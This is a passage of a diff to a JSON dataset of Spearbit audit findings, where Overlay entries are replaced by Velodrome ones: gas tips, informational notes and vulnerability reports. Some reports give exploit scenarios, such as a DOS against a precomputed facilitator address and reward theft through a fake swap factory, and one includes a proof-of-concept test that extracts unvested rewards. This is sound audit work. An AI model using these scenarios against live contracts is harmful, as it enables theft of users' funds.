The difference in price computation for the liquidation and unwind mechanism may make it better for users to liquidate themselves rather than unwinding their position. However, a check similar to compound is not effective at preventing this issue since users can always liquidate themselves from another address.", + "title": "Storage declarations in the middle of the file", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "If you wish to keep the logic separate, consider creating a separate abstract contract.", "labels": [ "Spearbit", - "Overlay", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Adding constructor params causes creation code to change", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Using constructor parameters in create2 makes the construction code different for every case. This makes address calculation more complex as you first have to calculate the construction code, hash it and then do address calculation. Whats worse is that Etherscan does not properly support auto-verification of contracts deployed via create2 with different creation code. Youll have to manually verify all markets individually. Additionally, needless salt in OverlayV1Factory.sol#L129.", + "title": "Inconsistent usage of _msgSender()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "There are some instances where msg.sender is used in contrast with _msgSender() function.", "labels": [ "Spearbit", - "Overlay", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational Voter.sol#L75-L78," ] }, { - "title": "Potential wrap of timestamp", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "In the transform() function, a revert could occur right after timestamp32 has wrapped (e.g. when timestamp > 2**32). function transform(... , uint256 timestamp, ...) ... { uint32 timestamp32 = uint32(timestamp % 2**32); // mod to fit in uint32 ... uint256 dt = uint256(timestamp32 - self.timestamp); // could revert if timestamp32 has just wrapped ... }", + "title": "Change emergency council should be enabled to Governor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Governor may also want to be able to set and change the emergency council, this avoids the potential risk of the council abusing their power", "labels": [ "Spearbit", - "Overlay", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Verify the validity of _microWindow and _macroWindow", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The constructor of OverlayV1Feed doesnt verify the validity of _microWindow and _macroWindow, potentially causing the price oracle to produce bad results if misconfigured. 
constructor(uint256 _microWindow, uint256 _macroWindow) { microWindow = _microWindow; macroWindow = _macroWindow; }", + "title": "Unnecessary inheritance in Velo contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Velo isn't used for governance, therefore it's not necessary to inherit from ERC20Votes.", "labels": [ "Spearbit", - "Overlay", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Simplify _midFromFeed()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The calculation in _midFromFeed() is more complicated than necessary because: min(x,y) + max(x,y) == x + y. More importantly, the average operation (bid + ask) / 2 can overflow and revert if bid + ask >= 2**256. function _midFromFeed(Oracle.Data memory data) private view returns (uint256 mid_) { uint256 bid = Math.min(data.priceOverMicroWindow, data.priceOverMacroWindow); uint256 ask = Math.max(data.priceOverMicroWindow, data.priceOverMacroWindow); mid_ = (bid + ask) / 2; }", + "title": "Incorrect value in Mint event", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "In Minter#update_period the Mint event is emitted with incorrect values.", "labels": [ "Spearbit", - "Overlay", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Use implicit truncation of timestamp", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Solidity will truncate data when it is typecast to a smaller data type, see solidity explicit-conversions. This can be used to simplify the following statement: uint32 timestamp32 = uint32(timestamp % 2**32); // mod to fit in uint32", + "title": "Do not cache constants", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It is not necessary to cache constant variables.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Set pos.entryPrice to 0 after liquidation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The liquidate() function sets most of the values of pos to 0, with the exception of pos.entryPrice. function liquidate(address owner, uint256 positionId) external { ... // store the updated position info data. mark as liquidated pos.notional = 0; pos.debt = 0; pos.oiShares = 0; pos.liquidated = true; positions.set(owner, positionId, pos); ... }", + "title": "First week will have no emissions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "update_period cannot be called during the first week because the current period is set to this week. Emissions will start at most one week later.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Store result of expression in temporary variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Several gas optimizations are possible by storing the result of an expression in a temporary variable, such as the value of oiFromNotional(data, capNotionalAdjusted). 10 function build( ... ) { ...
uint256 price = isLong ? ask(data, _registerVolumeAsk(data, oi, oiFromNotional(data, capNotionalAdjusted))) : bid(data, _registerVolumeBid(data, oi, oiFromNotional(data, capNotionalAdjusted))); ... require(oiTotalOnSide <= oiFromNotional(data, capNotionalAdjusted), \"OVLV1:oi>cap\"); } A: The value of pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) could be stored in a temporary variable to save gas. B: The value of oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) could also be stored in a temporary variable to save gas and make the code more readable. C: The value of pos.oiSharesCurrent(fraction) could be stored in a temporary variable to save gas. function unwind(...) ... { ... uint256 price = pos.isLong ? bid( data, _registerVolumeBid( data, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide), // A1 oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) // B1 ) ) : ask( data, _registerVolumeAsk( data, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide), // A2 oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) // B2 ) ); ... if (pos.isLong) { oiLong -= Math.min( oiLong, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) // A3 ); oiLongShares -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); // C1 } else { oiShort -= Math.min( oiShort, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) // A4 ); oiShortShares -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); // C2 } ... pos.oiShares -= Math.min(pos.oiShares, pos.oiSharesCurrent(fraction)); // C3 } The value of 2 * k * timeElapsed could also be stored in a temporary variable: 11 function oiAfterFunding( ...) ... { ... if (2 * k * timeElapsed < MAX_NATURAL_EXPONENT) { fundingFactor = INVERSE_EULER.powDown(2 * k * timeElapsed); }", + "title": "Variables can be renamed for better clarity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "For a better understanding, some variables could be renamed.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Flatten code of OverlayV1UniswapV3Feed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Functions _fetch(), _inputsToConsultMarketPool(), _inputsToConsultOvlWethPool() and con- sult() do a lot of interactions with small arrays and loops over them, increasing overhead and reading difficulty.", + "title": "Minter week will eventually shift", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The constant WEEK is used as the duration of an epoch that resets every Thursday, after 4 years (4 * 365.25 days) the day of the week will eventually shift, not following the Thursday cadence.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Replace memory with calldata", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "External calls to functions with memory parameters can be made more gas efficient by replacing memory with calldata, as long as the memory parameters are not modified.", + "title": "Ownership change will break certain yield farming automations", + "html_url": 
"https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Due to the check, any transfer done in the same block as the call to depositManaged will revert. While a sidestep for the mechanic for malicious users was shown, the check will prevent a common use case in Yield Farming: Zapping. Because of the check, an end user will not be able to zap from their VELO to VE to the Managed Position, which may create a sub-par experience for end users. This should also create worse UX for Yield Farming Projects as they will have to separate the transfer from the deposit which will cost them more gas and may make their product less capital efficient", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "No need to cache immutable values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Variables microWindow and macroWindow are immutable, so it is not necessary to cache them because the compiler inlines their value. contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { function _fetch() internal view virtual override returns (Oracle.Data memory) { // cache micro and macro windows for gas savings uint256 _microWindow = microWindow; uint256 _macroWindow = macroWindow; ... } } abstract contract OverlayV1Feed is IOverlayV1Feed { ... uint256 public immutable microWindow; uint256 public immutable macroWindow; ... constructor(uint256 _microWindow, uint256 _macroWindow) { microWindow = _microWindow; macroWindow = _macroWindow; } }", + "title": "Quantitative analysis of Minter logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It will take 110 iterations to go from 15 MLN to the Tail Emission Threshold Minter.sol#L32-L37 /// @notice When emissions fall below this amount, begin tail emissions uint256 public constant TAIL_START = 5_000_000 * 1e18; /// @notice Tail emissions rate in basis points uint256 public tailEmissionRate = 30; /// @notice Starting weekly emission of 15M VELO (VELO has 18 decimals) uint256 public weekly = 15_000_000 * 1e18; ## Python allows decimal Math, wlog, just take mantissa INITIAL = 15 * 10 ** 6 TAIL = 5 * 10 ** 6 MULTIPLIER_BPS = 99_00 MAX_BPS = 10_000 value = INITIAL i = 0 min_emitted = 0 while (value > TAIL): i+= 1 min_emitted += value value = value * MULTIPLIER_BPS / MAX_BPS i 110 value 4965496.324815211 min_emitted 1003450367.5184793 ## If nobody ever bridged, this would be emissions at tail min_emitted * 30 / 10_000 3010351.1025554384 Tail emissions are most likely going to be a discrete step down in emissions >>> min_emitted 1003450367.5184793 V1_CIRC = 150 * 10 ** 6 ranges = range(V1_CIRC // 10, V1_CIRC, V1_CIRC // 10) for val in ranges: print((min_emitted + val) * 30 / 10_000) 3055351.1025554384 3100351.1025554384 3145351.1025554384 3190351.1025554384 3235351.1025554384 3280351.1025554384 3325351.1025554384 3370351.1025554384 3415351.1025554384 The last value before the tail will be most likely around 1 Million fewer tokens minted per period. 
Maximum Mintable Value is slightly above Tail, with Absolute Max being way above Tail ## Max Supply >>> 1000 * 10 ** 6 1000000000 >>> min_emitted = 1003450367.5184793 >>> max_circ = 1000 * 10 ** 6 + min_emitted >>> max_mint = max_circ * 30 / 10_000 ## If we assume min_emitted + 1 Billion Velo V1 Sinked >>> max_mint 6010351.102555438 ## If we assume nudge to 100 BPS >>> abs_max_mint = max_circ * 100 / 10_000 >>> abs_max_mint 20034503.675184794", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Simplify circuitBreaker", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The function circuitBreaker() does a divDown() which can be circumvented to save gas and improving readability. function circuitBreaker(Roller.Snapshot memory snapshot, uint256 cap) ... { ... if (minted <= int256(_circuitBreakerMintTarget)) { return cap; } else if (uint256(minted).divDown(_circuitBreakerMintTarget) >= 2 * ONE) { return 0; } ... }", + "title": "Optimism's block production may change in the future", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because OP may change block frequency in the future, and given Bedrock's update to block.timestamp, it may be desirable to refactor back to the OZ implementation. VeloGovernor also assumes 2 blocks every second. OP's docs say block.number is not a reliable timing reference: community.optimism.io/docs/developers/build/differences/#block-numbers-and-timestamps It is also dangerous to use block.number at this time because it will probably mean a different thing pre- and post-Bedrock upgrade.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Remove unused / redundant functions and variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Functions nextPositionId() and mid() in OverlayV1Market.sol are not used internally and dont appear to be useful. contract OverlayV1Market is IOverlayV1Market { function nextPositionId() external view returns (uint256) { return _totalPositions; } function mid(Oracle.Data memory data,uint256 volumeBid,uint256 volumeAsk) ... { ... } } The functions oiInitial() and oiSharesCurrent() in library Position.sol have the same implementation. The oiInitial() function does not seem useful as it retrieves current positions and not initial ones.
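The Minter numbers above are REPL fragments; a consolidated, runnable version of the same decay loop (same constants as quoted from Minter.sol, float division kept so the figures match those above) is:

# Weekly emissions start at 15M VELO and decay 1% per epoch (99_00 / 10_000)
# until they fall below TAIL_START (5M), after which tail emissions begin.
INITIAL = 15_000_000
TAIL_START = 5_000_000
MULTIPLIER_BPS = 9_900
MAX_BPS = 10_000
TAIL_RATE_BPS = 30

value, weeks, total_emitted = float(INITIAL), 0, 0.0
while value > TAIL_START:
    total_emitted += value
    value = value * MULTIPLIER_BPS / MAX_BPS
    weeks += 1

print(weeks)                     # 110 iterations to reach the tail
print(round(value))              # ~4,965,496 weekly emission at the crossover
print(round(total_emitted))      # ~1,003,450,368 emitted before the tail
print(round(total_emitted * TAIL_RATE_BPS / MAX_BPS))  # ~3,010,351 weekly tail if nothing bridged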
library Position { /// @notice Computes the initial open interest of position when built ... function oiInitial(Info memory self, uint256 fraction) internal pure returns (uint256) { return _oiShares(self).mulUp(fraction); } /// @notice Computes the current shares of open interest position holds ... function oiSharesCurrent(Info memory self, uint256 fraction) internal pure returns (uint256) { return _oiShares(self).mulUp(fraction); } } 15 The function liquidationPrice() in library Position.sol is not used from the contracts. Because it type is internal it cannot be called from the outside either. library Position { function liquidationPrice(... ) internal pure returns (uint256 liqPrice_) { ... } } The variables ovlWethToken0 and ovlWethToken1 are stored but not used anymore. constructor(..., address _ovlWethPool,...) .. { ... // need OVL/WETH pool for ovl vs ETH price to make reserve conversion from ETH => OVL address _ovlWethToken0 = IUniswapV3Pool(_ovlWethPool).token0(); address _ovlWethToken1 = IUniswapV3Pool(_ovlWethPool).token1(); ... ovlWethToken0 = _ovlWethToken0; ovlWethToken1 = _ovlWethToken1; ... }", + "title": "Event is missing indexed fields", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Indexed event fields make the field more quickly accessible to off-chain tools that parse events. However, note that each indexed field costs extra gas during emission, so it's not necessarily best to index the maximum allowed per event (three fields). Each event should use three indexed fields if there are three or more fields, and gas usage is not particularly of concern for the events in question. If there are fewer than three fields, all of the fields should be indexed.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization OverlayV1Market.sol#L536-L539," + "Velodrome", + "Severity: Informational" ] }, { - "title": "Optimize power functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "In contract OverlayV1Market.sol, several power calculations are done with EULER / INVERSE_EULER as a base which can be optimized to save gas. function dataIsValid(Oracle.Data memory data) public view returns (bool) { ... uint256 dpLowerLimit = INVERSE_EULER.powUp(pow); uint256 dpUpperLimit = EULER.powUp(pow); ... } Note: As the Overlay team confirmed, less precision might be sufficient for this calculation.
OverlayV1Market.sol: fundingFactor = INVERSE_EULER.powDown(2 * k * timeElapsed); OverlayV1Market.sol: bid_ = bid_.mulDown(INVERSE_EULER.powUp(pow)); OverlayV1Market.sol: ask_ = ask_.mulUp(EULER.powUp(pow)); 16", + "title": "Missing checks for address(0) when assigning values to address state variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Lack of zero-address validation on address parameters may lead to transaction reverts, waste gas, require resubmission of transactions and may even force contract redeployments in certain cases within the protocol.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational FactoryRegistry.sol#L26-L28, RewardsDistributor.sol#L308," ] }, { - "title": "Redundant Math.min()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The function capNotionalAdjustedForCircuitBreaker() calculates circuitBreaker() and then does a Math.min(cap,...) with the result. However circuitBreaker() already returns a value that is <= cap. So the Math.min(...) function is unnecesary. 17 function capNotionalAdjustedForCircuitBreaker(uint256 cap) public view returns (uint256) { ... cap = Math.min(cap, circuitBreaker(snapshot, cap)); return cap; } function circuitBreaker(Roller.Snapshot memory snapshot, uint256 cap) public view returns (uint256) { ... if (minted <= int256(_circuitBreakerMintTarget)) { return cap; } else if (...) { return 0; } // so minted > _circuitBreakerMintTarget, thus minted / _circuitBreakerMintTarget > ONE ... uint256 adjustment = 2 * ONE - uint256(minted).divDown(_circuitBreakerMintTarget); // so adjustment <= ONE return cap.mulDown(adjustment); // so this is <= cap }", + "title": "Incorrect comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "There are a few mistakes in the comments that can be corrected in the codebase.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Replace square with multiplication", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The contract OverlayV1Market.sol contains the following expression several times: x.powDown(2 * ONE). This computes the square of x. However, it can also be calculated in a more gas efficient way: function oiAfterFunding(...) { ... uint256 underRoot = ONE - oiImbalanceBefore.divDown(oiTotalBefore).powDown(2 * ONE).mulDown( ONE - fundingFactor.powDown(2 * ONE) ); ... }", + "title": "Discrepancies between specification and implementation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Instance 1 - Zapping The specification mentioned that it supports zapping into a pool from any token. Following is the extract: Swapping and lp depositing/withdrawing of fee-on-transfer tokens. Zapping in and out of a pool from any token (i.e. A->(B,C) or (B,C) -> A). A can be the same as B or C. Zapping and staking into a pool from any token.
However, the zapIn and zapOut functions utilize the internal _swap function that does not support fee-on-transfer tokens.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Retrieve roles via constants in import", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Within contract OverlayV1Factory.sol, the roles GOVERNOR_ROLE, MINTER_ROLE, BURNER_ROLE are retrieved via an external function call. To save gas they could also be retrieved as constants via import. Additionally, a role ADMIN_ROLE is defined in contract OverlayV1Token.sol, which is the same as DEFAULT_ADMIN_- ROLE of AccessControl.sol. This ADMIN_ROLE could be replaced with DEFAULT_ADMIN_ROLE. modifier onlyGovernor() { - + require(ovl.hasRole(ovl.GOVERNOR_ROLE(), msg.sender), \"OVLV1: !governor\"); require(ovl.hasRole(GOVERNOR_ROLE, msg.sender), \"OVLV1: !governor\"); _; } ... function deployMarket(...) { ... ovl.grantRole(ovl.MINTER_ROLE(), market_); ovl.grantRole(MINTER_ROLE, market_); ovl.grantRole(ovl.BURNER_ROLE(), market_); ovl.grantRole(BURNER_ROLE, market_); ... - + - + }", + "title": "Early exit for withdrawManaged function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "VotingEscrow.withdrawManaged function.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Double check action when snapAccumulator == 0 in transform()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The function transform() does a check for snapAccumulator + value == 0 (where all variables are of type int256). This could be true if value == -snapAccumulator (or snapAccumulator == value == 0) A comment shows this is to prevent division by 0 later on. The division is based on abs(snapAccumulator) + abs(value). So this will only fail when snapAccumulator == value == 0. function transform(...) ... { ... int256 accumulatorNow = snapAccumulator + value; if (accumulatorNow == 0) { // if accumulator now is zero, windowNow is simply window // to avoid 0/0 case below return ... ---> this comment might not be accurate } ... uint256 w1 = uint256(snapAccumulator >= 0 ? snapAccumulator : -snapAccumulator); // w1 = abs(snapAccumulator) uint256 w2 = uint256(value >= 0 ? value : -value); uint256 windowNow = (w1 * (snapWindow - dt) + w2 * window) / (w1 + w2); // only fails if w1 == w2 == 0 ... // w2 = abs(value) ,! ,! }", + "title": "DOS attack at future facilitator contract and stop SinkManager.convertVe", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "As noted in \"DOS attack by delegating tokens at MAX_DELEGATES = 1024\", the old votingEscrow has a gas concern, i.e., the gas cost of transfer/burn will increase when an address holds multiple NFT tokens. The concern becomes more serious when the protocol is deployed on Optimism, where the gas limit is smaller than other L2 chains. If an address is being attacked and holds max NFT tokens (1024), the user can not withdraw funds due to the gas limit. To mitigate the potential DOS attack where the attacker DOSes the v1's votingEscrow and stops sinkManager from receiving tokens, the sinkManager utilizes a facilitator contract.
When the sinkManager needs to receive the votingEscrow NFT, it creates a new contract specifically for this purpose. Since the contract is newly created, it does not contain any tokens, making it more gas-efficient to receive the token through the facilitator contract. However, an attacker can DOS the contract by sending NFT tokens to a future facilitator. salted-contract-creations-create2 When creating a contract, the address of the contract is computed from the address of the creating contract and a counter that is increased with each contract creation. The exploit scenario would be: At the time the sinkManager is deployed, zero facilitators have been created. The attacker can calculate the address of all future facilitators by computing sha3(rlp.encode([normalize_address(sender), nonce]))[12:] The attacker computes the 10th facilitator's address and sends 1024 NFT tokens to the address. The sinkManager will function normally nine times. Though, when the 10th user wants to convert the token, the sinkManager deploys the 10th facilitator at that address. Since the 10th facilitator already has 1024 NFT positions, it cannot receive any tokens. The transaction will revert and the sinkManager will be stuck in the current state.", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "Add unchecked in natural log (ln) function or remove the functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The function ln() in contract LogExpMath.sol does not use unchecked, while the function log() does. Note: Neither ln() nor log() are used, so they could also be deleted. function log(int256 arg, int256 base) internal pure returns (int256) { unchecked { ... } } function ln(int256 a) internal pure returns (int256) { // no unchecked }", + "title": "RewardDistributor caching totalSupply leading to incorrect reward calculation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "RewardDistributor distributes newly minted VELO tokens to users who lock the tokens in VotingEscrow. Since the calculation of past supply is costly, the rewardDistributor caches the supply value in uint256[1000000000000000] public veSupply. The RewardDistributor._checkpointTotalSupply function would iterate from the last updated time until the latest epoch time, fetch totalSupply from votingEscrow, and store it. Assume the following scenario when a transaction is executed at the beginning of an epoch. 1. The totalSupply is X. 2. The user calls checkpointTotalSupply. The rewardDistributor saves the totalSupply = X. 3. The user creates a lock with 2X the amount of tokens. The user has balance = 2X and the totalSupply becomes 3X. 4. Fast forward to when the reward is distributed.
The user claims the tokens; the reward is calculated as total reward * balance / supply, and the user gets 2x of the total rewards.", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "Specialized functions for the long and short side", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The functions build(), unwind() and liquidate() contain a large percentage of code that is differ- ent for the long and short side.", + "title": "Lack of slippage control during compounding", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "When swapping the reward tokens to VELO tokens during compounding, the slippage control is disabled by configuring the amountOutMin to zero. This can potentially expose the swap/trade to sandwich attacks and MEV (Miner Extractable Value) attacks, resulting in a suboptimal amount of VELO tokens received from the swap/trade. router.swapExactTokensForTokens( balance, 0, // amountOutMin routes, address(this), block.timestamp );", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Beware of chain dependencies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The contracts have a few dependencies/assumptions which arent future proof and/or limit on which chain the code can be deployed. The AVERAGE_BLOCK_TIME is different on several EVM based chains. As the the Ethereum mainchain, the AVER- AGE_BLOCK_TIME will change to 12 seconds after the merge. contract OverlayV1Market is IOverlayV1Market { ... uint256 internal constant AVERAGE_BLOCK_TIME = 14; // (BAD) TODO: remove since not futureproof ... } WETH addresses are not the same on different chains. See Uniswap Wrapped Native Token Addresses. Note: Several chains have a different native token instead of ETH. 21 contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { address public constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2; ... }", + "title": "ALLOWED_CALLER can steal all rewards from AutoCompounder using a fake factory in the route.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "AutoCompounder allows addresses with the ALLOWED_CALLER role to trigger swapTokenToVELOAndCompound. The function sells the specified tokens to VELO. Since the Velo router supports multiple factories, an attacker can deploy a fake factory with a backdoor. By routing the swaps through the backdoor factory the attacker can steal all reward tokens in the AutoCompounder contract.", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Move _registerMint() closer to mint() and burn()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Within functions unwind() and liquidate() there is a call to _registerMint() as well as calls to ovl.mint() and ovl.burn(). However these two are quite a few lines apart so it is not immediately obvious they are related and operate on the same values. Additionally _registerMint() also registers burns. function unwind(...) ... { ... _registerMint(int256(value) - int256(cost)); ...
// 40 lines of code if (value >= cost) { ovl.mint(address(this), value - cost); } else { ovl.burn(cost - value); } ... } function liquidate(address owner, uint256 positionId) external { ... _registerMint(int256(value) - int256(cost)); ... // 33 lines of code ovl.burn(cost - value); ... }", + "title": "depositManaged can be used by locks to receive unvested VELO rebase rewards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Velo offers rebase emissions to all Lockers. These are meant to be deposited via depositFor into an existing lock, and directly transferred if the lock just expired. The check is the following: if (_timestamp > _locked.end && !_locked.isPermanent) { By calling depositManaged we can get the check to pass for a Lock that is not expired, allowing us to receive Unvested Velo (we could sell unfairly for example). Due to how depositManaged and withdrawManaged work, the attacker would be able to perform this every other week (1 week cooldown, 1 week execution). Because managedRewards are delayed by a week, the attacker will not lose any noticeable amount of rewards, meaning that most users would rationally opt into performing this operation to gain an unfair advantage, or to sell their rewards each week while other Lockers are unable or unwilling to perform this operation. The following POC will show an increase in VELO balance for the tokenId2 owner in spite of the fact that the lock is not expired. Logs: Epoch 1 Token Locked after 56039811453980167852 Token2 Locked after -1000000000000000000000000 // Negative because we have `depositManaged` User Bal after 56039811453980167852 // We received the token directly, unvested function testInstantClaimViaManaged() public { // Proof that if we depositManaged, we can get our rebase rewards instantly // Instead of having to vest them via the lock skipToNextEpoch(1 days); minter.updatePeriod(); console2.log(\"Epoch 1\"); VELO.approve(address(escrow), TOKEN_1M * 2); uint256 tokenId = escrow.createLock(TOKEN_1M, MAXTIME); uint256 tokenId2 = escrow.createLock(TOKEN_1M, MAXTIME); uint256 mTokenId = escrow.createManagedLockFor(address(this)); skipToNextEpoch(1 hours + 1); minter.updatePeriod(); skipToNextEpoch(1 hours + 1); minter.updatePeriod(); // Now we claim for 1, showing that they increase locked int128 initialToken1 = escrow.locked(tokenId).amount; distributor.claim(tokenId); // Claimed from previous epoch console2.log(\"Token Locked after \", escrow.locked(tokenId).amount - initialToken1); // For 2, we deposit managed, then claim, showing we get tokens unlocked uint256 initialBal = VELO.balanceOf(address(this)); int128 initialToken2 = escrow.locked(tokenId2).amount; voter.depositManaged(tokenId2, mTokenId); distributor.claim(tokenId2); // Claimed from previous epoch console2.log(\"Token2 Locked after \", escrow.locked(tokenId2).amount - initialToken2); console2.log(\"User Bal after \", VELO.balanceOf(address(this)) - initialBal); }", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Use of Math.min() is error-prone", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Function Math.min() is used in two ways: To get the smallest of two values, e.g. x = Math.min(x,y); To make sure the resulting value is >=0, e.g.
